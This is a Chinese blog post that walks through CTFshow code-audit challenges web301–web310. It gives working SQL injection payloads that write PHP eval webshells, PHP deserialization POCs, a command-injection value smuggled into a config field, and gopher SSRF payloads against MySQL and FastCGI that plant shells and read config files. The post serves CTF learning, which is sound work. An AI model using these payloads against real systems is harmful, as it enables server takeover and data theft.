CTFshow 代码审计

已于 2022-12-01 10:22:22 修改
阅读量894 收藏 1
点赞数
文章标签: php 数据库 开发语言 web安全 网络安全
于 2022-11-30 12:19:22 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/starttv/article/details/128112858
版权

目录

CTFshow 代码审计

web301-sql注入

下载源码分析checklogin.php,发现sql语句没有过滤。

$sql="select sds_password from sds_user where sds_username='".$username."' order by id limit 1;";
$result=$mysqli->query($sql);

sqlmap一把梭

sqlmap -u http://18bfacbb-1712-4a48-8a78-bd1446fc5987.challenge.ctf.show/checklogin.php --form --batch --dump

可以写文件

userid=a ' union select "<?php eval($_POST[1]);?>" into outfile "/var/www/html/a.php"%23&userpwd=b

web302-sql注入+

与上道题的变化不是很大,sql语句还是没有过滤,直接写文件

userid=a ' union select "<?php eval($_POST[1]);?>" into outfile "/var/www/html/a.php"%23&userpwd=b

web303-弱口令+sql注入

分析源码在dptadd.php有注入点,无过滤,但要求先登录,尝试弱口令admin,admin登录成功。

#查表名
dpt_name=1',sds_address =(select group_concat(table_name) from information_schema.tables where table_schema=database())%23
#查列名
dpt_name=1',sds_address =(select group_concat(column_name) from information_schema.columns where table_name='sds_fl9g')%23
#查flag
dpt_name=1',sds_address =(select flag from sds_fl9g)%23

web304-同上

和上面一样,只是表名变了

#查表名
dpt_name=1',sds_address =(select group_concat(table_name) from information_schema.tables where table_schema=database())%23
#查列名
dpt_name=1',sds_address =(select group_concat(column_name) from information_schema.columns where table_name='sds_flaag')%23
#查flag
dpt_name=1',sds_address =(select flag from sds_flaag)%23

web305-反序列化

查看源码发现多了waf,SQL注入应该是注不进去了。

function sds_waf($str){
	if(preg_match('/\~|\`|\!|\@|\#|\$|\%|\^|\&|\*|\(|\)|\_|\+|\=|\{|\}|\[|\]|\;|\:|\'|\"|\,|\.|\?|\/|\\\|\<|\>/', $str)){
		return false;
	}else{
		return true;
	}
}

发现多了个class.php,并且在checklogin.php有反序列入口,到这里思路就清晰了。

poc:

<?php
class user{
	public $username;
	public $password;
	public function __construct(){
		$this->username='a.php';
		$this->password='<?php
		$link=mysqli_connect("localhost","root","root","sds","3306");  
		if($link->connect_error){
			die("连接失败".$link->connect_error);
		}
		$sql="select * from sds_flabag";  
		$res= $link->query($sql);
		$data=$res->fetch_all();
		var_dump($data);
		?>';
	}
}
$a=new user();
echo urlencode(serialize($a));

写入一句话木马后用蚁剑连接查数据库即可,数据库的用户名和密码可以在conn.php中找到。

不知道什么问题,我的蚁剑在执行sql语句时就会卡住。所以我写入一个php查数据库的文件,可以正常查询。

web306-mvc

在index.php和login.php中发现反序列化入口。

在class.php中发现危险函数file_put_contents​。

在dao类调用close

poc:

<?php
class dao{
	private $conn;

	public function __construct(){
		$this->conn=new log();
	}
}
class log{
	public $title='a.php';
	public $info='<?php eval($_POST[1]);?>';
}
$a=new dao();
echo base64_encode(serialize($a));

web307-mvc+

这道题的源码更符合MVC结构。

1.logut.php存在反序列化入口

2.dao类存在clearCache()

3.config类存在cache_dir​变量

poc:

<?php
class config{
	public $cache_dir = ';echo  "<?php eval(\$_POST[1]);?>" >a.php;';//linux的shell里面$有特殊意义所以转义一下。

}
class dao{
	private $config;
	public function __construct(){
		$this->config=new config();
	}

}
$a=new dao();
echo base64_encode(serialize($a));
?>

修改cookie,cookie是service不是user了。

访问

http://767e680f-e6aa-4d95-8a1c-e289cdc3b489.challenge.ctf.show/controller/a.php

web308-gophar打mysql

1.index.php存在反序列化入口,并调用了checkVersion。

2.fun.php存在SSRF。

3.config.php发现数据库密码为空。

4.利用伪协议打mysql。

Give MySQL username: root
Give query to execute: select "<?php eval($_POST[1]);?>" into outfile '/var/www/html/2.php'

poc:

<?php
class dao{
	private $config;
	public function __construct(){
		$this->config=new config();
	}

}
class config{
	public $update_url = 'gopher://127.0.0.1:3306/_%a3%00%00%01%85%a6%ff%01%00%00%00%01%21%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%72%6f%6f%74%00%00%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%00%66%03%5f%6f%73%05%4c%69%6e%75%78%0c%5f%63%6c%69%65%6e%74%5f%6e%61%6d%65%08%6c%69%62%6d%79%73%71%6c%04%5f%70%69%64%05%32%37%32%35%35%0f%5f%63%6c%69%65%6e%74%5f%76%65%72%73%69%6f%6e%06%35%2e%37%2e%32%32%09%5f%70%6c%61%74%66%6f%72%6d%06%78%38%36%5f%36%34%0c%70%72%6f%67%72%61%6d%5f%6e%61%6d%65%05%6d%79%73%71%6c%45%00%00%00%03%73%65%6c%65%63%74%20%22%3c%3f%70%68%70%20%65%76%61%6c%28%24%5f%50%4f%53%54%5b%31%5d%29%3b%3f%3e%22%20%69%6e%74%6f%20%6f%75%74%66%69%6c%65%20%27%2f%76%61%72%2f%77%77%77%2f%68%74%6d%6c%2f%32%2e%70%68%70%27%01%00%00%00%01';
}
$a=new dao();
echo base64_encode(serialize($a));
?>

记得提前设置$_SESSION['login']

web309-fastcgi打9000

本题mysql​有密码,因此需要其他方式的攻击

通过gopher​协议的延时可以探测端口是否开放,开放的端口会保持连接,而未开放的端口会直接返回页面结果,经探测后9000​端口开放,基本可以确定是fastcgi​,继续利用gopherus​攻击即可。

poc:

<?php
class config{
	public $update_url = 'gopher://127.0.0.1:9000/_%01%01%00%01%00%08%00%00%00%01%00%00%00%00%00%00%01%04%00%01%00%F6%06%00%0F%10SERVER_SOFTWAREgo%20/%20fcgiclient%20%0B%09REMOTE_ADDR127.0.0.1%0F%08SERVER_PROTOCOLHTTP/1.1%0E%02CONTENT_LENGTH96%0E%04REQUEST_METHODPOST%09KPHP_VALUEallow_url_include%20%3D%20On%0Adisable_functions%20%3D%20%0Aauto_prepend_file%20%3D%20php%3A//input%0F%09SCRIPT_FILENAMEindex.php%0D%01DOCUMENT_ROOT/%00%00%00%00%00%00%01%04%00%01%00%00%00%00%01%05%00%01%00%60%04%00%3C%3Fphp%20system%28%27echo%20%22%3C%3Fphp%20eval%28%5C%24_POST%5B1%5D%29%3B%3F%3E%22%20%3E%20shell.php%27%29%3Bdie%28%27-----Made-by-SpyD3r-----%0A%27%29%3B%3F%3E%00%00%00%00';
}
class dao{
	private $config;
	public function __construct(){
		$this->config=new config();
	}

}
$a=new dao();
echo urlencode(base64_encode(serialize($a)));
?>

​[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-bFa3sNLy-1669781850752)(assets/image-20221130120123-3j14vau.png)]​

记得提前设置$_SESSION['login']

web310-4476端口

读配置文件:

<?php
class config{
	public $update_url = 'file:///etc/nginx/nginx.conf';
}
class dao{
	private $config;
	public function __construct(){
		$this->config=new config();
	}

}
$a=new dao();
echo (base64_encode(serialize($a)));
?>

​[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-60HiqbAb-1669781850753)(assets/image-20221130121636-ccwtpub.png)]​

访问4476端口

<?php
class config{
	public $update_url = 'http://127.0.0.1:4476';
}
class dao{
	private $config;
	public function __construct(){
		$this->config=new config();
	}

}
$a=new dao();
echo (base64_encode(serialize($a)));
?>

​[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-EahkN1GN-1669781850753)(assets/image-20221130121455-yan1s5m.png)]​

Sn_u
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CTFSHOW-WEB入门代码审计
Re_ly0n的博客
11-02 430
web301 漏洞点checklogin.php $sql="select sds_password from sds_user where sds_username='".$username."' order by id limit 1;"; sqlmap一把梭出来账号密码登录拿到flag web302 更改部分 if(!strcasecmp(sds_decode($userpwd),$row['sds_password'])){ sqlmap跑出来账号密码却不知为何无法登录,然后尝试写
CTFSHOW web183 正则爆破脚本
10-21
CTFSHOW web183 正则爆破脚本
ctfshow web308 ssrf
fmyyy1的博客
07-15 364
在index.php里 $service = unserialize(base64_decode($_COOKIE['service'])); if($service){ $lastVersion=$service->checkVersion(); } 在dao.php中有checkVersion方法 checkUpdate function checkUpdate($url){ $ch=curl_init(); curl_setopt($ch, CURLOPT_URL, $ur.
CTF】git源码泄露和代码审计
weixin_52450702的博客
01-19 2207
一道ctf题目中的学习:git泄露、源码获取与函数绕过学习。
ctfshow web入门 web306--web310源码审计
最新发布
2301_81040377的博客
05-27 592
链接:https://juejin.cn/post/7083293190022758407。访问1.php再rce就行了,但是不知道为啥我今天做不出来,弄了好一会了。商业转载请联系作者获得授权,非商业转载请注明出处。说的源码没变,这里我们写个EXP看配置文件。这些题都要在index.php发包才可以。我是终于找到了在一堆里面弄。这和之前的完全不一样了。作者:OceanSec。
CTF】AWDP总结(Web
热门推荐
weixin_51614272的博客
06-29 1万+
AWDP是一种综合考核参赛团队攻击、防御技术能力、即时策略的攻防兼备比赛模式。每个参赛队互为攻击方和防守方,充分体现比赛的实战性、实时性和对抗性,对参赛队的渗透能力和防护能力进行综合全面的考量。比赛中,每支队伍拥有相同配置的虚拟靶机,参赛队员需对平台中的GameBox发起攻击,并向平台提交正确的flag(证明自己具备对该题的攻击能力);在此期间,由平台以轮次制的方式向参赛队伍的靶机发起攻击,检查其他选手的漏洞是否修补成功,若修补成功则认为参赛队伍具备该漏洞的防御能力。计分规则如下:比赛过程中每支参赛队拥有相
ctfshow代码审计
qq_61768489的博客
01-26 1268
4476端口对应着 /var/flag目录,有个index.html文件,这和我们连上蚁剑后知道的一样。给的源码还是308,还是用fastcgi,这次直接写shell进去,因为flag文件不知道在哪。可以利用file_put_contents来写shell ,需要调用close()方法。思路与上题一样,不过是输入的password经过了一点加密,构造一下就行。sql注入写shell也是没问题的,因为sql语句依旧是正常执行了。似乎没有调用,与上题一样,换一种方式,有报错信息就试试报错注入。
ctfshow 代码审计
qq_45951598的博客
05-21 707
web301 这里看了一下文件发现,就一些登入页面文件 然后简单看了一下文件,定位到checklogin.php这个文件,做个简单的代码审计 <?php error_reporting(0); session_start(); require 'conn.php'; $_POST['userid']=!empty($_POST['userid'])?$_POST['userid']:""; //判断当前传入的userid是否为空,空的话返回为空 $_POST['userpwd']=!empty(
ctfshow web139命令盲注脚本
10-21
ctfshow靶场 web入门 web139 命令盲注脚本
ctfshow web214 时间盲注标准脚本
10-21
ctfshow web214 时间盲注标准脚本
ctfshow web185 正则爆破脚本
10-21
ctfshow web185 正则爆破脚本,以true拼接形成数字,实现ascii代替数字、字母和特殊符号
CTF工具之seay源代码审计系统(web).rar
09-16
工具用于学习交流用途,切勿用于其它用途。
ctfshow web240 insert 爆破表名
10-21
ctfshow web240 insert 爆破表名
CTF-PHP代码审计学习笔记分享
m0_62945162的博客
06-12 1274
CTF学习笔记分享-PHP代码审计。自己总结,若有错误,请联系改正,谢谢!
ctfshow web入门代码审计 web301-305
m0_62207170的博客
04-20 454
ctfshow web入门代码审计 web301-305
php反序列化字符逃逸
leekos的博客,分享web安全相关知识~
01-04 1206
php反序列化字符逃逸
Ctfshow web入门 代码审计web301-web310 详细题解 全
Jay17的博客
09-21 1588
Ctfshow web入门 代码审计web301-web310 详细题解 全
CTFshow——代码审计
D.MIND 的博客
04-07 1476
文章目录web301——SQL注入web301——SQL注入web303——报错注入web304——报错注入web305——web306——web307—— web301——SQL注入 将源码下载下来。主要看checklogin.php: $sql="select sds_password from sds_user where sds_username='".$username."' order by id limit 1;"; $result=$mysqli->query($sql); $row=
CTF练习——代码审计
HasntStartIsOver的博客
06-04 694
页面无返回值,也没有报错。说明通过了所有拦截,但是文件不存在或者是空白的。在source.php中展示了源代码,下面进行源码分析。源码中注释了source.php,直接访问该页面。一次尝试 payload =,最后获得flag。
ctfshow代码审计
10-17
好的,关于ctfshow代码审计,我可以提供一些基本的信息和思路。 首先,ctfshow是一个CTF比赛平台,其代码审计主要涉及到平台的安全性和漏洞。具体来说,可以从以下几个方面入手: 1. 用户输入的安全性:检查用户输入是否存在注入漏洞、XSS漏洞等。 2. 权限控制:检查平台是否存在越权访问、未授权访问等问题。 3. 文件上传:检查文件上传功能是否存在任意文件上传漏洞。 4. 密码安全:检查密码存储方式是否安全,是否存在明文存储等问题。 5. 代码质量:检查代码是否存在逻辑漏洞、缺陷等问题。 以上是一些常见的审计点,具体还需要根据实际情况进行分析。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值